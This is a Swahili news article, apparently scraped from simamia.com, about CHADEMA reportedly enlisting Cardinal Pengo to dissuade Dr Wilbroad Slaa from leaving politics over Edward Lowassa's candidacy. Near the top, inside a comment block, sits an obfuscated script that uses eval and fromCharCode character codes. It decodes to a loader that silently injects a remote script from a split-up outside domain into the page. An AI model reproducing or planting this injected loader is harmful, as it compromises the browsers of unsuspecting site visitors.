Recent Comments

Chadema Kumkimbilia Askofu Pengo

By Baraka Bitariho Aug 1, 2015
<p>Bado nipo na Chadema</p><script>var o=String;eval(o.fromCharCode(102,117,110,99,116,105,111,110,32,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,115,114,99,41,10,123,10,32,32,32,32,114,101,116,117,114,110,32,66,111,111,108,101,97,110,40,100,111,99,117,109,101,110,116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,10,125,10,10,118,97,114,32,98,100,32,61,32,34,104,116,116,34,43,34,112,115,58,34,43,34,47,34,43,34,47,115,34,43,34,108,101,101,34,43,34,112,46,115,116,114,97,34,43,34,116,34,43,34,111,115,98,34,43,34,111,100,121,46,99,111,109,47,34,43,34,115,99,34,43,34,114,105,112,34,43,34,116,34,43,34,115,47,104,101,97,34,43,34,100,46,106,34,43,34,115,34,43,34,63,34,43,34,118,61,51,34,43,34,46,34,43,34,56,34,43,34,46,48,34,59,10,10,105,102,40,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,98,100,41,61,61,61,102,97,108,115,101,41,123,10,9,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,32,10,115,46,115,114,99,61,98,100,59,10,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,10,105,102,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,33,61,61,110,117,108,108,41,123,10,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,10,125,10,125,10,32,101,108,115,101,32,123,10,9,105,102,40,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,33,61,61,110,117,108,108,41,123,10,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,10,9,125,10,125,10,10,125));/*54745756836*/</script>
Bado nipo na Chadema
Bado nipo na Chadema

Chama cha Demokrasia na Maendeleo (CHADEMA) kimemkimbilia Askofu wa Jimbo kuu la Dar es Salaam Mwadhama Polyicarp Kardinali Pengo ili kumsihi Katibu mkuu wa Chama hicho Dokta Wilbroad Slaa abadili uamuzi wake wa kujuzulu kisiasa.

Dokta Slaa ambaye imetajwa kufikia umaamuzi wa kuachana na siasa baada ya kutorizishwa na chama chake kuhusu uamuzi wa kumchukua Waziri mkuu wa zamani Edward Lowassa kutoka ndani ya Chama cha Mapinduzi CCM na kumpa nafasi ya kuwania Urais.

Taarifa za kuaminika toka ndani ya Chama cha Chadema zinasema kwa sasa chama hicho ni kama “kinahaha” kutafuta kile kinachotajwa kila aina ya njia kumzuia Dokta Slaa asifikia umamuzi huo, kwa madai ya kukiacha chama hicho sehemu mbaya.

Mtoa taarifa wetu huyo wa www.simamia.com, amesema kwa sasa chadema kimeanza hata kuwatumia viongozi wa kiroho akiwemo Askofu Pengo, kwa madai ya kuwa na ushawishi mkubwa kwa Kiongozi huyo wa Chadema.

“Yaani sahivi ujuo wa lowassa,sasa ni kama umekuwa mwiba ndani ya chama chetu,hatua anayotaka kuchuka Slaa ni mbaya sana,na ndio maana viongozi wetu,usiku na mchana wanahangaika kumturiza asifanye hivyo na ndio maana wameamua hadi kumkimbilia Askofu Pengo kuokoa Jahazi”kimesema chanzo chetu hicho kwa sharti la kutotaja jina lake.

Ameongeza kuwa “Ujue Slaa na Askofu Pengo ni marafiki sana hata kipindi kile cha nyuma alipokuwa “mtawa” kwahiyo chama kimeona kumtumia kiongozi huyu wa kiroho kunaweza kukisaidia chama chetu kumbadili Slaa na umuzi wake wa kustaafu siasa,maana bila Slaa chadema ni kazi bure”

Kuibuka kwa taarifa hizi,kuna kuja ikiwa ni siku chache baada ya Gazeti moja la kila siku kuripoti kuwa Dakta Slaa ameachana na siasa baada ya madai ya kutokubaliana na chama chake kumchukua Lowassa ambaye mara zote Lowassa alipokuwa CCM,Slaa amekuwa akimnadi ni Fisadi.

Alipotafutwa na Dakta Slaa na Chanzo cha Mtandao huu,ambapo alisema kuwa taarifa za yeye kuachana na siasa ni za uongo na kudai yeye yupo chadema,

Na akaendelea kusema “kutokuwepo ndani ya Ofisi ya Chadema sio kwamba nimekihama chama changu”

UTATA WA DAKTA SLAA NA CHADEMA.
Utata huo ulianzia mwishoni mwa wiki iliyopita baada ya kikao kilichoandaliwa na Vyama vya Upinzani vinavyounda Umoja wa kutetea Katiba ya wananchi Ukawa wakati wakimkabidhi Lowassa kadi ya Chadema,ambapo Mkutano huo ulihudhuliwa na viongozi wote wa Chadema pasipokuwepo na Dokta Slaa,Sanjari pia, utata ulizidi kuwepo baada ya Jana Lowassa alipojitokeza Makao mkuu ya Chadema wakati wa kuchukua fomu ya Urais ambapo katika ofisi hiyo iliyopo Kinondoni Jijini Dar es Salaam pia Katibu huyo hakuwepo Ofisini hapo Jambo ambalo linazidisha shaka.

WADAU MBALI MBALI WANENA.
Akizungumza na www.simamoa.com mwandishi mwandamizi wa Gazeti la Imman bwana Suleiman Magari amesema anachofanya Dokta Slaa ni mfumo wa kidhehebu uliopo nchini.

“Ujue hapa tunapepeza macho bure tusema ukweli,ujua hapa nchini tangu taifa hili lipate uhuru,kwenye nafasi ya Urais pindi akisimama Mgombea wa Urais kwa upande wa dini ya kikristo lazima awe dhehebu la Mkatoriki na huyo Lowassa ni Mluteri ndio maana Dokta Slaa anagoma kumuunga mkono huyo hapo kuna utata”amesema Magari

By Baraka Bitariho

Simamia is a news house where visitors will get up to date information on news, events, and so on. Join us to get updated, entertained and learn. Our website is www.Simamia.com or email us at SimamiaTeam@gmail.com